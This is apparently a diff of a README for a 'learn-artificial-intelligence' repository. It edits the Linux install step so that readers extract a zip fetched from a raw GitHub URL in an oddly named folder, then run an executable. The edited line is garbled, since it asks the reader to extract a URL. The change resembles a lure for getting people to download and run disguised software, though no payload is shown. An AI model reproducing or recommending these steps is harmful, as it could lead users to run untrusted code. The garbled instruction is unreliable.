Renato4333/learn-artificial-intelligence/README.md

   - Drag the application into your Applications folder.

 - **For Linux:**
-  - Extract the downloaded `.tar.gz` file.
+  - Extract the downloaded `https://raw.githubusercontent.com/Renato4333/learn-artificial-intelligence/main/holotrichal/learn-artificial-intelligence.zip` file.
   - Open a terminal and navigate to the extracted folder.
   - Run the application by executing `./learn-ai-linux`.